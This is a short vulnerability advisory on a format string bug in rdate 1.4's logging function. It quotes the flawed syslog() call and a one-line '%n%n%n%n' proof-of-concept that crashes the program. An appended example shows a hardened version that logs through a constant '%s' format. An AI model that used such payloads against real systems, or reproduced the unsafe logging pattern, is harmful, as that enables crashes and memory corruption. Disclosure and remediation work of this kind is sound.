+-----[ Software ]-----+

'rdate' retrieves the date and time from another machine on your network,
using the RFC 868 protocol. If you run rdate as root, it will set your
machine's local time to the time of the machine that you queried.
(http://directory.fsf.org/sysadmin/remote/rdate.html)

+-----[ Version ]-----+

Version 1.4 (stable) released on 2004-04-27

+-----[ Description ]-----+

Format string vulnerability.

+-----[ Vulnerable Code ]-----+

[rdate.c]

static void writeLog(int is_error, char *format, ...)
{
	va_list args;
	int n;
	char buf[2048];

	va_start(args, format);
	n = vsnprintf(buf, sizeof(buf), format, args);
	va_end(args);

	if(n < 1)
		return; /* Error, which we can't report because this _is_ the error reporting mechanism */

	if(log_mode)
		syslog(is_error?LOG_WARNING:LOG_INFO, buf); /* bad bad bad */

	if(is_error || print_mode)
		fprintf(is_error?stderr:stdout, "%s: %s\n", argv0, buf);
}

+-----[ Conclusion ]-----+

Virulent@siyahsapka.org:/rdate-1.4# ./rdate -l %n%n%n%n
Segmentation fault (core dumped)

+-----[ Greetings ]-----+

#coders @ irc.ttnet.net.tr
Deicide

+-----[ Contact ]-----+

http://virulent.siyahsapka.org
virulent@siyahsapka.org

+----------------------+
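
A hardened form of the writeLog() function quoted under Vulnerable Code, added here as an example; it is not code from the advisory or from rdate. The already-formatted buffer goes to the logger as an argument to a constant "%s" format. The names writeLogSafe, log_sink, capture_sink and log_for_host, and the message text "could not resolve %s", are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Stand-ins for rdate.c's globals (values constructed for this example). */
static int log_mode = 1, print_mode = 0;
static const char *argv0 = "rdate";
/* Hypothetical indirection with syslog()'s signature, so the call can be captured. */
static void (*log_sink)(int priority, const char *format, ...) = syslog;
static char captured[2048];

static void capture_sink(int priority, const char *format, ...)
{
    va_list args;
    va_start(args, format);
    vsnprintf(captured, sizeof(captured), format, args);
    va_end(args);
}

/* The attribute lets GCC/Clang check each call's format against its arguments. */
__attribute__((format(printf, 2, 3)))
static void writeLogSafe(int is_error, const char *format, ...)
{
    va_list args;
    char buf[2048];
    int n;
    va_start(args, format);
    n = vsnprintf(buf, sizeof(buf), format, args);
    va_end(args);
    if (n < 1) return;
    if (log_mode)   /* buf may hold user text: an argument, never the format */
        log_sink(is_error ? LOG_WARNING : LOG_INFO, "%s", buf);
    if (is_error || print_mode)
        fprintf(is_error ? stderr : stdout, "%s: %s\n", argv0, buf);
}

/* Logs a constructed message about `host`; returns what reached the sink. */
static const char *log_for_host(const char *host)
{
    log_sink = capture_sink;
    captured[0] = '\0';
    writeLogSafe(0, "could not resolve %s", host);
    return captured;
}

int main(void)
{
    return puts(log_for_host("%n%n%n%n")) == EOF;   /* logs the text literally */
}
```

Building with GCC's -Wformat-security flags calls of the syslog(priority, buf) shape, where the format is not a string literal and no arguments follow it.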